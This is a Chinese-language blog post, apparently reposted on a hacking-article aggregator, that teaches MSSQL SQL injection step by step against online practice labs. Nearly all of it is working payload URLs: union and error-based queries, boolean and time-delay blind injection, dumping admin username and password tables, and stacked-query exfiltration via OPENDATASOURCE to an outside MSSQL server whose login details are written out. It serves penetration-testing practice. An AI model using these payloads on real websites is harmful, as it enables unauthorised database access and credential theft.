记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

【技术分享】MSSQL数据库注入全方位利用

2021-08-26 20:36

 

前言

在渗透测试过程中遇到了MSSQL数据库,市面上也有一些文章,不过大多数讲述的都是如何快速利用注入漏洞getshell的,对于MSSQL数据库的注入漏洞没有很详细地描述。在这里我查阅了很多资料,希望在渗透测试过程中遇到了MSSQL数据库能够相对友好地进行渗透测试,文章针对实战性教学,在概念描述方面有不懂的还请自行百度,谢谢大家~

 

注入前准备

1、确定注入点

http://219.153.49.228:40574/new_list.asp?id=2 and 1=1

http://219.153.49.228:40574/new_list.asp?id=2 and 1=2

2、判断是否为mssql数据库

sysobjects为mssql数据库中独有的数据表,此处页面返回正常即可表示为mssql数据库。

http://219.153.49.228:40574/new_list.asp?id=2 and (select count(*) from sysobjects)>0
还可以通过MSSQL数据库中的延时函数进行判断,当语句执行成功,
页面延时返回即表示为MSSQL数据库。
http://219.153.49.228:40574/new_list.asp?id=2;WAITFOR DELAY '00:00:10'; -- asd

3、相关概念

  • 系统自带库

MSSQL安装后默认带了6个数据库,其中4个系统级库:master,model,tempdb和msdb;2个示例库:Northwind Traders和pubs。
这里了解一下系统级库:

master:主要为系统控制数据库,其中包括了所有配置信息、用户登录信息和当前系统运行情况。model:模版数据库tempdb:临时容器msdb:主要为用户使用,所有的告警、任务调度等都在这个数据库中。
  • 系统自带表

MSSQL数据库与Mysql数据库一样,有安装自带的数据表sysobjects和syscolumns等,其中需要了解的就是这两个数据表。

sysobjects:记录了数据库中所有表,常用字段为id、name和xtype。syscolumns:记录了数据库中所有表的字段,常用字段为id、name和xtype。

就如字面意思所述,id为标识,name为对应的表名和字段名,xtype为所对应的对象类型。一般我们使用两个,一个’U’为用户所创建,一个’S’为系统所创建。其他对象类型如下:

对象类型:AF = 聚合函数 (CLR)C = CHECK 约束D = DEFAULT(约束或独立)F = FOREIGN KEY 约束FN = SQL 标量函数FS = 程序集 (CLR) 标量函数FT = 程序集 (CLR) 表值函数IF = SQL 内联表值函数IT = 内部表P = SQL 存储过程PC = 程序集 (CLR) 存储过程PG = 计划指南PK = PRIMARY KEY 约束R = 规则(旧式,独立)RF = 复制筛选过程S = 系统基表SN = 同义词SQ = 服务队列TA = 程序集 (CLR) DML 触发器TF = SQL 表值函数TR = SQL DML 触发器U = 表(用户定义类型)UQ = UNIQUE 约束V = 视图X = 扩展存储过程
  • 排序&获取下一条数据

mssql数据库中没有limit排序获取字段,但是可以使用top 1来显示数据中的第一条数据,后面与Oracle数据库注入一样,使用<>或not in 来排除已经显示的数据,获取下一条数据。但是与Oracle数据库不同的是使用not in的时候后面需要带上(‘’),类似数组,也就是不需要输入多个not in来获取数据,这可以很大程序减少输入的数据量,如下:

#使用<>获取数据http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058' and name<>'id' and name<>'username'-- qwe#使用not in获取数据http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058' and name not in ('id','username')-- qwe
  • 堆叠注入

在SQL中,执行语句是通过;分割的,如果我们输入的;被数据库带入执行,那么就可以在其后加入sql执行语句,导致多条语句一起执行的注入,我们将其命名为堆叠注入。具体情况如下,很明显两条语句都进行了执行。

http://192.168.150.4:9001/less-1.asp?id=1';WAITFOR DELAY '0:0:5';-- qwe

 

显错注入

1、判断当前字段数

http://219.153.49.228:40574/new_list.asp?id=2 order by 4

http://219.153.49.228:40574/new_list.asp?id=2 order by 5

通过order by报错情况,可以判断出当前字段为4。

2、联合查询,获取显错点

2-1、首先因为不知道具体类型,所以还是先用null来填充字符

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,null,null,null -- qwe

2-2、替换null为’null’,获取显错点

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'null','null',null -- qwe

当第一个字符设置为字符串格式时,页面报错,很明显这个就是id了,为整型字符。

http://219.153.49.228:40574/new_list.asp?id=-2 union all select 'null','null','null',null -- qwe

3、通过显错点获取数据库信息

3-1、获取数据库版本

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select @@version),null -- qwe

3-2、查询当前数据库名称
通过轮询db_name()里的内容,获取所有数据库库名

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select db_name()),null -- qwehttp://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select db_name(1)),null -- qwehttp://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select db_name(2)),null -- qwehttp://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select db_name(3)),null -- qwehttp://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select db_name(4)),null -- qwehttp://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select db_name(5)),null -- qwe

3-3、查询当前用户

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select user),null -- qwe

4、查询表名

查询dbo.sysobjects表中用户创建的表,获取其对应的id和name

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,id,name,null from dbo.sysobjects where xtype='U' -- qwe

查询下一个表名

#使用<>获取下一条数据http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.sysobjects where xtype='U' and id <> 5575058 -- qwe#使用not in获取下一条数据http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.sysobjects where xtype='U' and id not in ('5575058'-- qwe

5、查询列名

这里有个坑,查询列名的时候因为已经知道了表名的id值,所以where只需要使用id即可,不再需要xtype了。

http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058'-- qwe
http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,id,name,null from dbo.syscolumns where id='5575058' and name not in ('id','username')-- qwe

6、information_schema

值得一提的是,除了借助sysobjects表和syscolumns表获取表名、列名外,mssql数据库中也兼容information_schema,里面存放了数据表表名和字段名,但是查询的数据好像存在一些问题,只查询到了manager表。

http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select top 1 table_name from information_schema.tables where table_name <> 'manager'),null -- qwe
http://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select top 1 column_name from information_schema.columns where table_name = 'manage' ),null -- qwehttp://219.153.49.228:40574/new_list.asp?id=-2 union all select null,'1',(select top 1 column_name from information_schema.columns where table_name = 'manage' and column_name not in ('id','username')),null -- qwe

7、获取数据

http://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,username,password,null from manage-- qwehttp://219.153.49.228:40574/new_list.asp?id=-2 union all select top 1 null,username,password,null from manage where username <> 'admin_mz'-- qwe

解密获取密码

 

报错注入

mssql数据库是强类型语言数据库,当类型不一致时将会报错,配合子查询即可实现报错注入。

1、直接报错

等号两边数据类型不一致配合子查询获取数据。

#获取数据库库名?id=1' and 1=(select db_name()) -- qwe

#获取第一个表名?id=1' and 1=(select top 1 name from dbo.sysobjects) -- qwe

#将数据连接显示?id=1'  and 1=stuff((select db_name() for xml path('')),1,0,'')--+
2、convert()函数
convert(int,db_name()),将第二个参数的值转换成第一个参数的int类型。
具体用法如下:
#获取数据库库名?id=1' and 1=convert(int,(select db_name())) -- qwe

#获取数据库版本?id=1' and 1=convert(int,(select @@version))) -- qwe

3、cast()函数

CAST(expression AS data_type),将as前的参数以as后指定了数据类型转换。

具体用法如下:

#查询当前数据库?id=1' and 1=(select cast(db_name() as int)) -- qe

#查询第一个数据表?id=1' and 1=(select top 1 cast(name as int) from dbo.sysobjects) -- qe

4、数据组合输出

#将数据表组合输出?id=1' and 1=stuff((select quotename(name) from dbo.sysobjects  for xml path('')),1,0,'')--+
#查询users表中的用户名并组合输出?id=1'  and 1=stuff((select quotename(username) from users for xml path('')),1,0,'')--+
 
布尔盲注

1、查询数据库库名

1-1、查询数据库库名长度为11

http://219.153.49.228:40768/new_list.asp?id=2 and len((select top 1 db_name()))=11

1-2、查询第一个字符的ascii码为109

http://219.153.49.228:40768/new_list.asp?id=2 and ascii(substring((select top 1 db_name()),1,1))=109http://219.153.49.228:40768/new_list.asp?id=2 and ascii(substring((select top 1 db_name()),1,1))>109

1-3、查询第二个字符的ascii码为111

http://219.153.49.228:40768/new_list.asp?id=2 and ascii(substring((select top 1 db_name()),2,1))=111

1-4、获取所有ascii码之后,解码获取数据

2、查询表名

除了像上面查询库名使用了ascii码外,还可以直接猜解字符串

http://219.153.49.228:40768/new_list.asp?id=2 and substring((select top 1 name from dbo.sysobjects where xtype='U'),1,1)='m'
http://219.153.49.228:40768/new_list.asp?id=2 and substring((select top 1 name from dbo.sysobjects where xtype='U'),1,6)='manage'
 
延时盲注

1、延时函数 WAITFOR DELAY

语法:n表示延时几秒WAITFOR DELAY '0:0:n'id=1 if (布尔盲注的判断语句) WAITFOR DELAY '0:0:5' -- qwe
2、查询数据
#判断如果第一个库的库名的第一个字符的ascii码为109,则延时5秒http://219.153.49.228:40768/new_list.asp?id=2 if (ascii(substring((select top 1 db_name()),1,1))=109) WAITFOR DELAY '0:0:5' -- qwe
#判断如果第一个表的表名的第一个字符为m,则延时5秒http://219.153.49.228:40768/new_list.asp?id=2 if (substring((select top 1 name from dbo.sysobjects where xtype='U'),1,1)='m') WAITFOR DELAY '0:0:5' -- qwe

反弹注入

就像在Mysql中可以通过dnslog外带,Oracle可以通过python搭建一个http服务器接收外带的数据一样,在MSSQL数据库中,我们同样有方法进行数据外带,那就是通过反弹注入外带数据。
反弹注入条件相对苛刻一些,一是需要一台搭建了mssql数据库的vps服务器,二是需要开启堆叠注入。
反弹注入需要使用opendatasource函数。

OPENDATASOURCE(provider_name,init_string):使用opendatasource函数将当前数据库查询的结果发送到另一数据库服务器中。
1、环境准备

1-1、首先打开靶场

1-2、连接vps的mssql数据库,新建表test,字段数与类型要与要查询的数据相同。这里因为我想查询的是数据库库名,所以新建一个表里面只有一个字段,类型为varchar。

CREATE TABLE test(name VARCHAR(255))

2、获取数据库所有表

2-1、使用反弹注入将数据注入到表中,注意这里填写的是数据库对应的参数,最后通过空格隔开要查询的数据。

#查询sysobjects表?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select name from dbo.sysobjects where xtype='U' -- qwe#查询information_schema数据库?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select table_name from information_schema.tables -- qwe
2-2、执行成功页面返回正常。

2-3、在数据库中成功获取到数据。

3、获取数据库admin表中的所有列名

#查询information_schema数据库?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select column_name from information_schema.columns where table_name='admin'-- qwe#查询syscolumns表?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.test select name from dbo.syscolumns where id=1977058079-- qwe

4、获取数据

4-1、首先新建一个表,里面放三个字段,分别是id,username和passwd。

CREATE TABLE data(id INT,username VARCHAR(255),passwd VARCHAR(255))
4-2、获取admin表中的数据
?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC18D_test_admin;pwd=123456;database=DB_14DC18D_test').DB_14DC18D_test.dbo.data select id,username,passwd from  admin -- qwe

 

总结

完成这篇文章共费时1周,主要花时间在环境搭建以及寻找在线靶场。全文从显错注入、报错注入到盲注和反弹注入,几乎涵盖了所有MSSQL注入类型,若有所遗漏还请联系我,我必将在原文基础上进行改进。因为能力有限,本文未进行太多了原理描述,也因为SQL注入原理市面上已经有很多文章进行了讲解,所以文章最终以实战注入作为重心开展,讲述找寻到注入点后在如何在多种情况下获取数据。

靶场采用墨者学院、掌控安全,以及MSSQL-sqli-labs靶场,实际攻击时还需要考虑waf绕过等,后续会计划完成一篇针对waf绕过和提权getshell的文章,敬请期待~


- 结尾 -
精彩推荐
【技术分享】探索DOM XSS一个trick的原理
【技术分享】第二届"祥云杯" WEB WP
【技术分享】Electron的openExternal可控利用点分析
CEO为创业资金,竟招募黑客干起了勒索交易?
戳“阅读原文”查看更多内容

知识来源: https://mp.weixin.qq.com/s?__biz=MzA5ODA0NDE2MA==&mid=2649751100&idx=1&sn=67d02d3b2769a610859c1d8cdb32efb9

阅读:14554 | 评论:0 | 标签:注入 SQL

想收藏或者和大家分享这篇好文章→复制链接地址

“【技术分享】MSSQL数据库注入全方位利用”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求赞助求支持💖

标签云